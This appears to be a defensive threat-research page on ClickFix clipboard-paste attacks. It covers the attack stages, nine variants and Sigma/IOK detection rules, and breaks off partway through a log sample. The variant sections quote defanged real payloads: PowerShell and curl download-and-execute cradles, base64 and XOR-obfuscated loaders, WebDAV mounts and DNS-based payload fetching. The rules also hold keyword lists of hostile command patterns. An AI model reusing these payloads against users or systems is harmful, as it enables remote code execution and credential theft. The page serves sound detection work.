← All Chokepoints
HIGH
ClickFix Techniques
User pastes a malicious command from their clipboard into a Run dialog, terminal, or Explorer address bar. The lure page writes to the clipboard via JavaScript and the user does the rest. No attachment, no exploit, no macro. The clipboard is the delivery mechanism and the scripting interpreter spawn is the chokepoint. 9 variants tracked, from fake CAPTCHAs to cloned install pages to DNS-based payload retrieval. APT28, MuddyWater, and Kimsuky adopted ClickFix for espionage in late 2024. This is not just commodity crimeware anymore.
Attack Chokepoints 3 invariant stages
Each stage is an invariant condition the attacker must satisfy, regardless of tool, variant, or threat actor. Detection at any stage breaks the chain.
1 Clipboard Seeding ▶
Prerequisites
- Scripting interpreter on target (powershell.exe, cmd.exe, mshta.exe)
- Browser with Clipboard API (enabled by default everywhere)
Input
User lands on a lure page
Chokepoint
Page must write to clipboard via JS AND display paste instructions. Both are required. Without the write there is nothing to paste, without the instruction the user does not paste.
Observable
Web proxy or IOK match: navigator.clipboard.writeText co-occurring with Win+R / terminal / paste instructions on the same page.
Why unavoidable
Redesign the lure all you want. The clipboard write + paste instruction co-occurrence survives every visual change.
Data Sources
- Web proxy with JS/HTML content inspection
- IOK lure-page rule feed (phish.report)
- ETW Microsoft-Windows-Win32k (GUID: 8c416c79-d49b-4f01-a467-e56d3aa8234c)
- ETW Microsoft.Windows.OLE.Clipboard (GUID: 3e0e3a92-b00b-4456-9dee-f40aba77f00e)
Bypass risk: Clipboard ETW detection requires SilkETW or EDR with Win32k telemetry. Not available via standard Sysmon configuration.
IOK match: ClickFix lure page with clipboard API ▶
page.html: navigator.clipboard.writeText("powershell -w hidden -enc JABzAD0...") + div.innerText = "Press Win+R, paste, and hit Enter"
Key signal: clipboard_api + execution_hint co-occurrence
↓
User pastes into Run dialog, terminal, or Explorer addres...
2 Interpreter Execution ▶
Input
User pastes into Run dialog, terminal, or Explorer address bar
Chokepoint
Script interpreter (powershell, cmd, mshta) spawns as child of explorer.exe, browser, or wt.exe. The parent-child relationship is the attack primitive.
Observable
Sysmon EID 1: script interpreter with ParentImage = explorer.exe / browser / wt.exe.
Why unavoidable
Paste-and-execute is the technique. Every variant produces this parent-child signal.
Data Sources
- Sysmon Event ID 1 (Process Creation)
- Windows Security Event ID 4688 (Process Creation)
Sysmon EID 1: explorer.exe spawns powershell.exe with encoded command ▶
ParentImage: C:\Windows\explorer.exe | Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | CommandLine: powershell -w hidden -enc JABzAD0AbgBlAHcALQBvAGIAagBlAGMAdA...
Key signal: explorer.exe → powershell.exe with -enc flag
↓
Interpreter is running the pasted command
3 Second Stage Retrieval ▶
Input
Interpreter is running the pasted command
Chokepoint
Interpreter fetches next stage from attacker infrastructure. Inline payloads (hex XOR, base64 -enc) skip this stage entirely, growing to 75% of domains by Apr 2026. See trends page.
Observable
Sysmon EID 3: script interpreter → outbound to non-RFC1918 address. Correlate ProcessGuid with Stage 2 EID 1.
Why unavoidable
Remote fetch is visible on the wire. Inline payloads bypass this stage but Stage 2 still fires. Run both detections.
Data Sources
- Sysmon Event ID 3 (Network Connection)
- Sysmon Event ID 22 (DNS Query)
Bypass risk: Delayed execution (sleep before outbound) evades short time-window correlation. Extend correlation window to 5+ minutes in hunt and analyst rules
Sysmon EID 3: powershell.exe outbound to staging domain ▶
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | DestinationIp: 185.244.xxx.xxx | DestinationPort: 443 | Initiated: true
Key signal: interpreter outbound to non-RFC1918 IP within 30s of EID 1 event
Variations 9 variants tracked
Tools and methods that exploit this chokepoint. The list grows. The chokepoint doesn't change.
ClickFix 2024-Q1 Active ▶
Original variant; first documented by Proofpoint in March 2024 via TA571; fake CAPTCHA or browser fix prompts user to paste command into Run dialog or terminal
Lure — what the user sees
Simulated lure
Fake Cloudflare CAPTCHA or reCAPTCHA page. User clicks "I'm not a robot" checkbox, then page displays "Verification Steps" instructing: 1. Press Win+R 2. Press Ctrl+V 3. Press Enter. The clipboard is silently loaded with the payload before the user sees the instructions. Each visit shows the user's actual domain and a random Cloudflare Ray ID to reinforce legitimacy.
Clipboard payload (defanged)
conhost.exe --headless cmd /c cd /D %userprofile% && curl -s -o a.exe hxxp[://]213.209.150[.]188:8112/a.exe && conhost.exe --headless a.exe && REM By pressing the enter button you confirm you are not a botUses conhost.exe --headless to run cmd.exe without a visible console window. curl downloads the payload to %userprofile%\a.exe from a hardcoded IP over HTTP port 8112, then a second headless conhost.exe executes the dropped binary. The trailing REM comment disguises the command as a CAPTCHA confirmation in the Run dialog. No PowerShell involved. Pure cmd.exe + curl chain. Sourced from Huntress ClickFix analysis.
Same chokepoint: clipboard write → conhost.exe --headless → cmd.exe → curl.exe (outbound HTTP) → conhost.exe --headless → a.exe
Source: huntress.com →
FileFix 2025-Q2 Active ▶
Shifts attack surface from Run dialog to Windows File Explorer address bar; uses whitespace padding to hide the actual PowerShell command after a visible CAPTCHA label; Trycloudflare tunnel used for payload hosting; documented by Huntress
Lure — what the user sees
Simulated lure
Same CAPTCHA/verification pretext as ClickFix, but with a file upload button () that opens the Windows File Explorer. User is instructed to paste into the File Explorer address bar instead of the Run dialog.
Clipboard payload (defanged)
powershell.exe irm blake-wright-andorra-learners.trycloudflare[.]com/rhugei.jpg | iex # Capcha VerifyPasted into the File Explorer address bar. The visible portion in the address bar shows only "Capcha Verify" (intentional typo) after massive whitespace padding. The actual PowerShell command is scrolled off to the left. irm (Invoke-RestMethod) fetches a .jpg-disguised PowerShell script from a Trycloudflare tunnel, piped to iex (Invoke-Expression) for immediate execution. Trycloudflare tunnels provide free, disposable infrastructure that rotates on each deployment. Sourced from Huntress ClickFix analysis.
Same chokepoint: clipboard write → powershell.exe (parent: explorer.exe via address bar) → outbound HTTP to Trycloudflare tunnel
Source: huntress.com →
TerminalFix 2024-Q4 Active ▶
Mimics terminal windows; lure page uses navigator.platform OS detection to serve platform-specific payloads via JavaScript atob() decoding into the clipboard. Windows users get a PowerShell download cradle, macOS users get a curl-to-bash chain. Same hardcoded C2 IP, same campaign, two execution paths. Demonstrates how a single lure page covers both enterprise and developer endpoints. Documented by Huntress.
Lure — what the user sees
Simulated lure
Mimics a terminal/console window UI. Lure JavaScript detects OS via navigator.platform and writes a platform-specific payload to the clipboard using atob() decoding. Windows users are instructed to open PowerShell, macOS users to open Terminal. Single lure page, dual payloads. One campaign covers both OS targets.
Clipboard payload (defanged)
Windows
iwr -useb hxxp[://]93.185.166[.]113/troubleshoot.ps1 | iexServed via atob() decoding in lure JS when navigator.platform matches Windows. iwr -useb (Invoke-WebRequest -UseBasicParsing) fetches a PowerShell script from a hardcoded IP over HTTP, piped to iex for immediate execution. Same C2 IP as the macOS payload. Single infrastructure, dual OS targeting. Sourced from Huntress ClickFix analysis.
macOS
curl -o troubleshot.sh hxxp[://]93.185.166[.]113/troubleshot.sh && chmod +x troubleshot.sh && bash troubleshot.shServed via atob() decoding when navigator.platform matches macOS. Downloads troubleshot.sh (note typo in filename — "troubleshot" not "troubleshoot"), sets executable permission, and runs via bash. Three-step chain instead of piped execution. The file touches disk before running, unlike the Windows variant. Same C2 IP. Sourced from Huntress ClickFix analysis.
Same chokepoint: lure JS atob() → clipboard write (OS-specific) → powershell.exe or bash → outbound HTTP to 93.185.166[.]113
Source: huntress.com →
DownloadFix 2024-Q4 Active ▶
PoC by jfmaes (redteamer.tips). Different from other ClickFix variants: no clipboard paste, no Win+R. Page auto-generates a .cmd file via JavaScript Blob after 10 seconds, triggers a browser download, then instructs user to open downloads (Ctrl+J) and click repairtool.cmd. The .cmd file contains the payload. User clicks a file in their downloads, not a paste-and-execute flow.
Lure — what the user sees
Simulated lure
Fake "Download Interrupted!" error. JavaScript creates a .cmd file as a Blob after 10 seconds and triggers an automatic browser download. Page instructs user to press Ctrl+J (Chrome downloads) and click repairtool.cmd to "restore the document." No clipboard involved. The payload is a downloaded file the user executes from their browser downloads bar.
Clipboard payload (defanged)
@echo off
calc.exe
exit
# PoC payload. Real attacks replace calc.exe with download cradle or reverse shellThe .cmd file is generated client-side via JavaScript Blob, not fetched from a server. Page creates the file content in JS, converts to Blob, triggers download via dynamically created element. The PoC drops calc.exe. Real deployments would contain a PowerShell download cradle or direct payload.
Same chokepoint: JS Blob generates .cmd → browser auto-downloads file → user clicks repairtool.cmd → cmd.exe executes payload
Source: github.com →
JackFix / GlitchFix / ConsentFix 2025 Active ▶
Expanding family of named variants using the same clipboard-paste-execute primitive with different social engineering pretexts (consent dialogs, glitch/error UIs); same chokepoint applies. The GlitchFix / ErrTraffic panel renders garbled page content alongside a fake browser update dialog ("Browser update recommended") to create urgency — the victim believes their browser is broken and installs a malicious update.
Lure — what the user sees
Simulated lure
Expanding family using different social engineering pretexts: ConsentFix uses fake OAuth/consent dialogs ("Allow access to continue"). GlitchFix uses fake glitch/error UI with garbled page content and a browser update dialog ("Browser update recommended: install Firefox 122.0"). JackFix uses fake browser hijack warnings ("Security alert: paste to resolve"). All use the same clipboard-paste-execute primitive with different visual wrappers.
Clipboard payload (defanged)
powershell -w hidden -ep bypass -c "$v='693c2466...';$k=0x4B;$b=[byte[]]@(for($i=0;$i -lt $v.Length;$i+=2){[Convert]::ToByte($v.Substring($i,2),16) -bxor $k});IEX([Text.Encoding]::UTF8.GetString($b))"GlitchFix/ErrTraffic panel delivers XOR-obfuscated PowerShell via clipboard. Decrypted payload downloads an executable to $env:TEMP with a random filename via Invoke-WebRequest, then spawns a hidden PowerShell process to execute it. The command includes tracking parameters (&src=clickfix&cb=Chrome&ref=) to identify attack source and browser. Sourced from Censys ErrTraffic panel analysis.
Same chokepoint: clipboard write → powershell.exe (parent: explorer.exe) → outbound HTTP to ErrTraffic panel → payload dropped to %TEMP%
Source: huntress.com →
Source: censys.com →
WebDAV ClickFix 2025-Q1 Active ▶
Hosts payloads on attacker-controlled WebDAV shares; victims paste UNC paths (\\server\share\payload.hta) into Run dialog, or receive .url/.lnk shortcut files that silently mount WebDAV via File Explorer; mshta.exe executes JScript/HTA from the share in a fileless chain that loads a .NET assembly into memory and injects shellcode into explorer.exe; steganography used to hide shellcode in PNG images; payloads include LummaStealer, Xworm, AsyncRAT, NetSupport, and a modified r77 rootkit; tactics first observed February 2024, campaign volume spiked September 2024, detailed analysis published February 2026
Lure — what the user sees
Simulated lure
Fake verification page or document access prompt. User pastes a command that mounts a WebDAV share as a local drive, executes a batch file or HTA from the share, then removes the mapping. Some variants deliver .url or .lnk shortcut files instead.
Clipboard payload (defanged)
cmd.exe /c net use Z: hxxp[://]94.156.170[.]255/webdav /persistent:no && "Z:\update.cmd" & net use Z: /deleteNo PowerShell or mshta. Uses net use to mount a WebDAV share, execute update.cmd from the mapped drive, and delete the mapping immediately. Bypassed Microsoft Defender for Endpoint out-of-box detection. Only detected through RunMRU registry key threat hunting at Atos.
Same chokepoint: clipboard write → cmd.exe (parent: explorer.exe) → outbound WebDAV mount to attacker IP
Source: atos.net →
Source: securityboulevard.com →
InstallFix 2026-Q1 Active ▶
Clones legitimate software installation pages, particularly AI/developer tools such as Claude Code CLI. Distributed via Google Ads malvertising; swaps the legitimate curl-to-bash install one-liner with a malicious equivalent pointing to an attacker-controlled server; exploits developer trust in official-looking documentation; Windows chain: mshta.exe → conhost.exe → Amatera infostealer; also targets macOS; documented by PushSecurity and BleepingComputer, February–March 2026
Lure — what the user sees
Simulated lure
Pixel-perfect clone of official CLI tool install pages (Claude Code, NotebookLM). Includes layout, branding, documentation sidebar, and code blocks. Only difference: the install command URL points to an attacker-controlled domain. Distributed via Google Ads malvertising for queries like "Claude Code install." No fake error or CAPTCHA needed. The pretext is the user wanting to install software.
Clipboard payload (defanged)
macOS
curl -ksfLS $(echo 'aHR0cHM6Ly9jb250YXRvcGx1cy5jb20vY3VybC84ZDJkMjc1MzYwYWRlZGVjZmJiZDkxNTY3ZGFkZGVlZDgwZDIwYWNlYjhhYTQzMjBkMDZhMjE0ODY0OTM5NDVi'|base64 -D)| zshmacOS chain uses base64-encoded URL (decodes to hxxps[://]contatoplus[.]com/curl/8d2d275360...) fetched via curl, piped to zsh. Uses -D flag (macOS native base64 decode). A second documented sample uses saramoftah[.]com as the delivery domain. Sourced from PushSecurity InstallFix analysis.
Windows
C:\Windows\SysWOW64\mshta.exe hxxps[://]claude.update-version[.]com/claudeWindows chain spawns cmd.exe → mshta.exe → conhost.exe to deliver the Amatera infostealer. Pages hosted on Cloudflare Pages, Squarespace, and Tencent EdgeOne. Domain sourced from PushSecurity InstallFix analysis.
Same chokepoint: clipboard write (user copies "install" command) → mshta.exe or bash → outbound fetch from attacker domain
Source: pushsecurity.com →
Source: www.bleepingcomputer.com →
Windows Terminal ClickFix 2026-Q1 Active ▶
Disclosed by Microsoft Defender Experts, March 6, 2026; lure page instructs users to open Windows Terminal via Win+X→I shortcut and paste a hex-encoded XOR-compressed PowerShell payload; bypasses Run-dialog detections since the parent process is wt.exe (WindowsTerminal.exe) rather than explorer.exe; execution chain: wt.exe → powershell.exe → cmd.exe → MSBuild.exe (LOLBin); final payload is Lumma Stealer delivered via renamed 7-Zip binary extracting a malicious ZIP; uses QueueUserAPC injection into chrome.exe and msedge.exe for credential harvesting
Lure — what the user sees
Simulated lure
Lure page instructs users to open Windows Terminal via Win+X then I keyboard shortcut (instead of Win+R for Run dialog). Designed to bypass Run-dialog-based detections since the parent process is wt.exe rather than explorer.exe.
Clipboard payload (defanged)
powershell -w hidden -ep bypass -enc WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAH...
→ decodes to: IEX (New-Object Net.WebClient).DownloadString('hxxps[://]c2-lumma[.]net/drop')Hex-encoded XOR-compressed payload. Execution chain: wt.exe → powershell.exe → cmd.exe → MSBuild.exe (LOLBin). Final payload is Lumma Stealer delivered via renamed 7-Zip binary extracting a malicious ZIP. Uses QueueUserAPC injection into chrome.exe and msedge.exe for credential harvesting.
Same chokepoint: clipboard write → powershell.exe (parent: wt.exe) → outbound HTTP. Note: parent is wt.exe. Hunt rules must include this parent.
Source: thehackernews.com →
DNS-based ClickFix 2026-Q1 Active ▶
Disclosed by Microsoft February 2026; attributed to KongTuke targeting domain-joined corporate machines; user pastes cmd.exe command into Run dialog that invokes nslookup against an attacker-controlled DNS IP; PowerShell payload is embedded in the DNS Name field response (not a TXT record, bypasses TXT-record monitoring); cmd.exe extracts and executes the payload, which downloads a ZIP, drops a Python-based RAT (ModeloRAT) via VBScript, and persists via a Startup folder shortcut; evades URL-based web filtering entirely
Lure — what the user sees
Simulated lure
Lure instructs user to paste a command into the Run dialog. The command uses nslookup instead of HTTP to retrieve the payload. Evades URL-based web filtering entirely.
Clipboard payload (defanged)
Windows
cmd /c "nslookup ff123%USERNAME%[.]dns1[.]buhg-uslugi[.]ru && echo ✅ Ваше устройство добавлено в доверительное: 6520"AlfaCaptcha variant (alfacaptcha.alfasbank.ru). Embeds %USERNAME% in the DNS query subdomain for victim fingerprinting. The nslookup resolves against an attacker-controlled authoritative DNS server at buhg-uslugi[.]ru; the response Name field contains the PowerShell payload. The trailing echo with a checkmark and Russian confirmation message ("Your device has been added to the trusted list") is cosmetic. It makes the Run dialog output look like a successful verification to the victim. No HTTP/HTTPS involved. Payload delivery is entirely via DNS.
Windows
cmd /c "for /f "tokens=5" %a in ('nslookup example[.]com 84[.]21[.]189[.]20 2^>nul ^| find "Name"') do powershell -w hidden -c "%a"KongTuke variant (Microsoft disclosure, February 2026). Issues a DNS lookup against a threat-actor-controlled DNS server at 84[.]21[.]189[.]20. The response Name field contains the PowerShell payload, extracted via for /f parsing and executed. Final payload: Python-based RAT (ModeloRAT), persists via Startup folder shortcut.
Same chokepoint: clipboard write → cmd.exe → nslookup.exe (DNS query to attacker-controlled domain) → payload in DNS response
Source: clickfix.carsonww.com →
Source: www.bleepingcomputer.com →
Detection Strategy
Rules organized by the chokepoint stage they detect. Each stage has one or more rules at different maturity levels.
1
Clipboard Seeding
Pre-Execution, ETW Clipboard Write
Pre-Exec
Medium FP
▶
Detection Logic
Process: [any browser] writing to clipboard ClipboardContent contains: powershell, -enc, mshta, nslookup, cmd.exe, IEX, \\\\ (UNC)title: Browser Process Writing Scripting Payload to Clipboard (ETW)
id: f3b8e2d1-7c4a-4b9e-a2f6-1d8e5c0b3a7f
status: experimental
description: >
Detects browser processes writing PowerShell/cmd keywords to the clipboard via ETW.
Pre-execution layer — fires before the user pastes.
references:
- https://gist.github.com/mattifestation/04e8299d8bc97ef825affe733310f7bd
- https://github.com/mandiant/SilkETW
- https://www.proofpoint.com/us/blog/threat-insight/security-brief-clickfix-social-engineering-technique-floods-threat-landscape
- https://attack.mitre.org/techniques/T1204/004/
author: "@iimp0ster"
date: 2026/03/10
tags:
- attack.initial_access
- attack.t1204.004
- detection.maturity.hunt
- detection.datasource.etw
logsource:
product: windows
category: clipboard
# Requires ETW infrastructure. Two provider options:
# Microsoft-Windows-Win32k GUID: 8c416c79-d49b-4f01-a467-e56d3aa8234c
# Microsoft.Windows.OLE.Clipboard GUID: 3e0e3a92-b00b-4456-9dee-f40aba77f00e
# Configure SilkETW (github.com/mandiant/SilkETW) with either provider and route
# output to Windows Event Log or forward to SIEM via Windows Event Forwarding (WEF).
# Field names below reflect SilkETW JSON serialization defaults — adjust to match
# your ingestion pipeline's schema.
detection:
selection_browser:
ProcessName|endswith:
- '\chrome.exe'
- '\firefox.exe'
- '\msedge.exe'
- '\iexplore.exe'
- '\brave.exe'
- '\opera.exe'
- '\vivaldi.exe'
- '\waterfox.exe'
selection_payload_keywords:
ClipboardContent|contains:
- 'powershell'
- '-EncodedCommand'
- '-enc '
- 'mshta'
- 'nslookup'
- 'cmd.exe'
- 'wscript'
- 'cscript'
- 'IEX'
- 'Invoke-Expression'
- '\\\\' # UNC path prefix — WebDAV ClickFix variant
filter_legit_software:
# Tune for your environment — add legitimate software that triggers this rule
ProcessName|endswith:
- '\placeholder_tune_for_your_env.exe'
condition: selection_browser and selection_payload_keywords and not filter_legit_software
falsepositives:
- Developer tools or documentation sites that copy script examples to clipboard (rare
match against these specific keywords in combination with a browser process)
- Code snippet managers or password managers with keyboard shortcut triggers
level: high
Pre-Interaction, IOK Lure Page
Pre-Exec
Low FP
▶
Detection Logic
js contains: navigator.clipboard.writeText OR navigator.clipboard.write OR ClipboardItem html contains: Win+R OR Run dialog OR Ctrl+V OR Windows Terminal OR Win+X OR address bar Condition: clipboard_api AND execution_hinttitle: ClickFix Lure Page — Clipboard API Write with Execution Instruction
description: >
Detects ClickFix-family lure pages that combine a JavaScript Clipboard API write
(navigator.clipboard.writeText / ClipboardItem) with instructions directing the user
to paste into a Run dialog, Windows Terminal, File Explorer address bar, or similar
execution context. The co-occurrence of clipboard seeding AND an execution instruction
is the stable invariant across all ClickFix variants regardless of visual design,
threat actor, or obfuscation technique. Covers: ClickFix (original), FileFix, WebDAV
ClickFix, Windows Terminal ClickFix, InstallFix, DNS-based ClickFix, and future variants
that have not yet been named.
tags:
- clickfix
- initial_access
- t1204.004
references:
- https://www.proofpoint.com/us/blog/threat-insight/security-brief-clickfix-social-engineering-technique-floods-threat-landscape
- https://mrd0x.com/filefix-clickfix-alternative/
- https://thehackernews.com/2026/03/microsoft-reveals-clickfix-campaign.html
- https://attack.mitre.org/techniques/T1204/004/
- https://phish.report/docs/iok-rule-reference
detection:
clipboard_api:
js|contains:
- 'navigator.clipboard.writeText'
- 'navigator.clipboard.write'
- 'ClipboardItem'
execution_hint:
html|contains:
- 'Win+R'
- 'Windows key'
- 'Run dialog'
- 'Ctrl+V'
- 'Windows Terminal'
- 'Win+X'
- 'address bar'
- 'Ctrl+L'
condition: clipboard_api and execution_hint
# ─── IOK Detection Notes ─────────────────────────────────────────────────────────
# Kill chain position: PRE-INTERACTION — fires against the lure page itself, before
# the user copies or executes anything. Earliest possible detection point.
#
# Why this condition is stable across all variants:
# clipboard_api — the browser MUST write the payload to the clipboard; without this
# the user cannot paste it. Cannot be removed without breaking the attack.
# execution_hint — the page MUST instruct the user where to paste; without this the
# user will not execute the payload. Cannot be removed without breaking
# the social engineering component.
#
# False positive profile:
# clipboard_api alone → HIGH FP (widely used by legitimate sites for copy buttons)
# execution_hint alone → LOW FP (paste-into-shell instructions are unusual on legit sites)
# clipboard_api AND execution_hint → VERY LOW FP (near-unique to ClickFix)
#
# Evasion considerations:
# - Obfuscated clipboard writes (e.g., atob() + eval(), string concatenation) evade
# js|contains; add dom|contains matchers if your scanner supports post-JS rendering.
# - Multilingual lures: add translated execution instructions for your threat landscape
# (e.g., Japanese: 'を押して', Korean: '실행', etc.)
# - Dynamically injected clipboard write (loaded from external JS) evades js|contains;
# pair with requests|contains for known ClickFix JS CDN patterns.
#
# Usage:
# - Submit to phish.report/IOK for community feed inclusion.
# - Run against URLScan.io live scan API for proactive infrastructure hunting.
# - Integrate with web proxy content inspection for real-time blocking.
2
Interpreter Execution
Browser/explorer/wt.exe spawning script interpreter. Process creation only — ...
Hunt
Med FP
▶
Detection Logic
Script interpreter with parent = explorer.exe / wt.exe / browser. These should almost never spawn interpreters in enterprise. Investigate when they do.
Correlation required: This rule covers one stage only. See the description for SIEM-side join guidance.
title: Browser or Explorer Spawning Script Interpreter
id: a7b3c9d2-5e8f-4a1b-9c6d-3f2e8b0a4d7e
status: experimental
description: >
Detects scripting interpreters spawned by browsers, Explorer, or Windows Terminal.
Browsers should rarely spawn script interpreters in enterprise environments.
references:
- https://huntress.com/blog/dont-sweat-clickfix-techniques
- https://staging.huntress.com/blog/dont-sweat-clickfix-techniques
- https://mhaggis.github.io/ClickGrab/
- https://www.aitmfeed.com/blog/blog-1/tracking-clickfix-infrastructure-4
- https://attack.mitre.org/techniques/T1204/001/
- https://thehackernews.com/2026/03/microsoft-reveals-clickfix-campaign.html
- https://www.bleepingcomputer.com/news/security/new-clickfix-attack-abuses-nslookup-to-retrieve-powershell-payload-via-dns/
author: "@iimp0ster"
date: 2025/01/15
tags:
- attack.initial_access
- attack.t1204.001
- attack.t1204.003
- detection.maturity.hunt
logsource:
category: process_creation
product: windows
detection:
selection_interpreter:
Image|endswith:
- '\powershell.exe'
- '\pwsh.exe'
- '\cmd.exe'
- '\wscript.exe'
- '\cscript.exe'
- '\mshta.exe'
selection_parent_browser:
ParentImage|endswith:
- '\chrome.exe'
- '\firefox.exe'
- '\msedge.exe'
- '\iexplore.exe'
- '\opera.exe'
- '\brave.exe'
- '\vivaldi.exe'
- '\waterfox.exe'
selection_parent_explorer:
ParentImage|endswith:
- '\explorer.exe'
- '\wt.exe'
- '\WindowsTerminal.exe'
filter_known_legit:
# Browser-launched shell integrations for file associations (rare but legitimate)
CommandLine|contains:
- 'IEShims.dll'
- 'ShellExecute'
filter_legit_software:
# Tune for your environment — add legitimate software that triggers this rule
Image|endswith:
- '\placeholder_tune_for_your_env.exe'
condition: selection_interpreter and (selection_parent_browser or selection_parent_explorer) and not filter_known_legit and not filter_legit_software
falsepositives:
- Browser extensions that invoke system shell for file processing (rare)
- Shell integrations for file associations opened via browser download
- IT tooling launched from Windows Explorer (e.g., admin scripts opened by double-click)
- Some enterprise software launchers that spawn from explorer.exe
level: medium
Hunt parent filter + encoded/suspicious command-line content. If this fires, ...
Analyst
Low FP
▶
Detection Logic
Parent = browser/explorer/wt.exe AND CommandLine contains -enc, FromBase64String, IEX, DownloadString, net use, nslookup, or rundll32 \\\\.title: Browser-Spawned Script with Encoded Command — ClickFix/Clipboard Attack
id: f1e2d3c4-b5a6-4789-a0b1-c2d3e4f5a6b7
status: experimental
description: >
Detects scripting interpreters with encoded/obfuscated commands spawned by browsers,
Explorer, or Windows Terminal. Stage 2 process creation only — correlate ProcessGuid
with hunt-network.yml for Stage 3.
references:
- https://huntress.com/blog/dont-sweat-clickfix-techniques
- https://staging.huntress.com/blog/dont-sweat-clickfix-techniques
- https://mhaggis.github.io/ClickGrab/
- https://www.aitmfeed.com/blog/blog-1/tracking-clickfix-infrastructure-4
- https://attack.mitre.org/techniques/T1204/001/
- https://attack.mitre.org/techniques/T1204/003/
author: "@iimp0ster"
date: 2025/01/15
tags:
- attack.initial_access
- attack.t1204.001
- attack.t1204.004
- attack.defense_evasion
- attack.t1027
- detection.maturity.analyst
logsource:
category: process_creation
product: windows
detection:
selection_interpreter:
Image|endswith:
- '\powershell.exe'
- '\pwsh.exe'
- '\cmd.exe'
- '\wscript.exe'
- '\cscript.exe'
- '\mshta.exe'
- '\rundll32.exe'
selection_parent:
ParentImage|endswith:
- '\chrome.exe'
- '\firefox.exe'
- '\msedge.exe'
- '\iexplore.exe'
- '\opera.exe'
- '\brave.exe'
- '\vivaldi.exe'
- '\explorer.exe'
- '\wt.exe'
- '\WindowsTerminal.exe'
selection_encoded:
CommandLine|contains:
# PowerShell encoded command flags
- ' -enc '
- ' -EncodedCommand '
- ' -ec '
# Base64 decode patterns
- 'FromBase64String'
- 'Convert]::FromBase64'
# Execution patterns
- 'IEX ('
- 'IEX('
- 'Invoke-Expression'
- 'iex('
# Download-and-execute patterns
- 'DownloadString'
- 'DownloadFile'
- 'WebClient'
- 'Net.WebClient'
- 'Invoke-WebRequest'
- 'iwr '
- 'curl '
# mshta http invocation
- 'mshta http'
- 'mshta vbscript'
# cmd piping to powershell
- '/c powershell'
- '/c start'
# WebDAV variant patterns
- 'net use '
- '/persistent:no'
- 'rundll32 \\\\'
# DNS-staging variant patterns
- 'nslookup '
filter_legit_software:
# Known-good software that uses encoded commands during legitimate operation
# Tune this list for your environment
ParentCommandLine|contains:
- 'Teams.exe'
- 'OneDrive.exe'
condition: selection_interpreter and selection_parent and selection_encoded and not filter_legit_software
falsepositives:
- Legitimate software deployment tools that encode commands (rare when browser is parent)
- Custom IT automation scripts that use encoded commands and are user-initiated
- Developers using PowerShell with encoding from browser-launched terminals
level: high
3
Second Stage Retrieval
Script interpreter → outbound non-RFC1918. Baseline your environment.
Research
High FP
▶
Detection Logic
Any powershell/cmd/wscript/cscript/mshta outbound to non-RFC1918. No parent filter. Build your baseline of legitimate interpreter network activity first.title: Scripting Interpreter Outbound Network Connection
id: c4f8a2b1-3e7d-4a5c-8b9f-2d1e6f0a7c3b
status: experimental
description: >
Detects scripting interpreters making outbound connections to external (non-RFC1918)
addresses. Broad baseline — high FP rate expected.
references:
- https://huntress.com/blog/dont-sweat-clickfix-techniques
- https://mhaggis.github.io/ClickGrab/
- https://attack.mitre.org/techniques/T1204/001/
author: "@iimp0ster"
date: 2025/01/15
tags:
- attack.initial_access
- attack.t1204.001
- attack.t1204.003
- detection.maturity.research
logsource:
category: network_connection
product: windows
detection:
selection:
Initiated: 'true'
Image|endswith:
- '\powershell.exe'
- '\pwsh.exe'
- '\cmd.exe'
- '\wscript.exe'
- '\cscript.exe'
- '\mshta.exe'
filter_private:
DestinationIp|cidr:
- '10.0.0.0/8'
- '172.16.0.0/12'
- '192.168.0.0/16'
- '127.0.0.0/8'
- '::1/128'
filter_loopback:
DestinationIp: '0.0.0.0'
filter_legit_software:
# Tune for your environment — add legitimate software that triggers this rule
Image|endswith:
- '\placeholder_tune_for_your_env.exe'
condition: selection and not 1 of filter_*
falsepositives:
- Legitimate administrative scripts making web requests (SCCM, Ansible, etc.)
- Software update mechanisms (Windows Update, application updaters)
- Monitoring agents and IT management tooling
- Developer tooling (npm, pip, curl wrappers, build scripts)
- Security scanning tools
level: low
Browser-Spawned Interpreter Outbound Connection
Hunt
Med FP
New
▶
SIEM correlation required: Join this event's ProcessGuid with hunt.yml (Sysmon EID 1) where ParentImage is a browser/explorer/wt.exe and time delta < 300 seconds.
title: Browser-Spawned Script Interpreter Outbound Connection
id: d5e6f7a8-9b0c-4d1e-2f3a-4b5c6d7e8f9a
status: experimental
description: >
Detects scripting interpreters initiating outbound connections to non-RFC1918 addresses.
Stage 3 detection — correlate ProcessGuid with hunt.yml for parent chain confirmation.
references:
- https://iimp0ster.github.io/detection-chokepoints/chokepoints/clickfix-techniques/
- https://huntress.com/blog/dont-sweat-clickfix-techniques
- https://attack.mitre.org/techniques/T1204/004/
author: "@iimp0ster"
date: 2026/04/01
tags:
- attack.initial_access
- attack.t1204.004
- attack.command_and_control
- attack.t1071.001
- detection.maturity.hunt
- detection.chokepoint.stage3
logsource:
category: network_connection
product: windows
detection:
selection_interpreter:
Initiated: 'true'
Image|endswith:
- '\powershell.exe'
- '\pwsh.exe'
- '\cmd.exe'
- '\wscript.exe'
- '\cscript.exe'
- '\mshta.exe'
- '\nslookup.exe'
- '\rundll32.exe'
filter_private:
DestinationIp|cidr:
- '10.0.0.0/8'
- '172.16.0.0/12'
- '192.168.0.0/16'
- '127.0.0.0/8'
- '::1/128'
filter_loopback:
DestinationIp: '0.0.0.0'
filter_legit_software:
# Tune for your environment — add legitimate software that triggers this rule
Image|endswith:
- '\placeholder_tune_for_your_env.exe'
condition: selection_interpreter and not 1 of filter_*
# SIEM CORRELATION: Join ProcessGuid with hunt.yml (EID 1)
# where ParentImage = browser/explorer/wt.exe
# and time delta < 300 seconds
falsepositives:
- Legitimate administrative scripts making web requests (SCCM, Ansible)
- Software update mechanisms using PowerShell
- Developer tooling (npm, pip, build scripts)
level: medium
Raw Log Samples 3 samples
Real-world log events produced by this technique and which Sigma rules they trigger.
EID 1 Sysmon PowerShell spawned by Chrome with encoded command, the core ClickFix indicator ▶
EventID: 1 (Process Create)
UtcTime: 2024-11-03 14:52:17.442
ProcessGuid: {b2c3d4e5-2345-6789-bcde-f01234567890}
ProcessId: 7124
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
